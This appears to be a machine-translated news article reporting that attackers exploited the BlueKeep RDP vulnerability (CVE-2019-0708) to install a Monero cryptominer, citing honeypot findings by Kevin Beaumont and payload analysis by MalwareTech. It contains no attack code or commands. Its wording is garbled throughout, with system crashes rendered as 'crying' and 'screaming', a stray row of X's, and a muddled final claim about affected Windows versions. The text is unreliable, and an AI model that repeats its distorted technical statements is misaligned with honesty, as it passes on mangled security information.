The RDP vulnerability BlueKeep on Windows Remote Desktop Services is currently being used by hackers for cryptomining aims. The attackers are exploiting vulnerabilities systems to steal cryptocurrencies.
Attacks were observed through honeypots. The security investigator, who discovered the attempts, is Kevin Beaumont. THE researcher noticed that many honeypots on his EternalPot RDP honeypot network began to "crashAnd restart. The honeypots have been active for about half a year. Saturday was the first time a malfunction was observed. However, Beaumont noted that machinery in Australia did not "fail".
X X X X X X X X X X X X X X X X MalwareTech (web name) examined the issues cited by Beaumont and concluded that the "crying" was due to BlueKeep vulnerability. MalwareTech said the attackers used the BlueKeep vulnerability to install one Monero Miner.
The first analysis of MalwareTech showed that an initial payload executes a coded PowerShell command, which downloads a second coded PowerShell script. The final payload is a cryptominer (probably for Monero).
According to the researcher, the malicious software is not a worm, but it exploits en masse the BlueKeep vulnerability. So the researcher realized that the attackers were using more than one BlueKeep scanner, which helps them to detect them vulnerable systems, to install the cryptominer.
The researcher also said that server used to exploit the vulnerability gets the target IP addresses from a predefined list.
A combination of cryptominer and BlueKeep scanner had also been reported in July. The malicious software, which combined these two features, was named Watchbog and it was mainly targeted Linux servers.
Intezer had studied malware then and found that scanner integration "indicates that WatchBog is preparing a list of vulnerable systems that hackers will target in the future or sell to others."
However, according to MalwareTech, the current attacks are not related to Watchbog malware.
BlueKeep: Brief history of vulnerability
The vulnerability BlueKeep (CVE-2019-0708) made its appearance many months ago. The experts security they rated it as critical, as it allows malware to spread to vulnerable systems without user intervention. Many governments and security companies have begun to warn of the criticality of vulnerability, and so Microsoft released a patch on 14 in May.
Typically, exploiting this RDP vulnerability results in a "screaming" of the target system. The researchers, who created a working exploit, tried to keep the details secret, so that hackers could not immediately create their own version and exploit uninstalled systems.
What versions of Are Windows Affected?
Fortunately, BlueKeep vulnerability does not affect all versions of Windows. According to Microsoft, hackers can influence them Windows 7, Windows Server 2008 R2 and Windows Server 2008 and install cryptominer.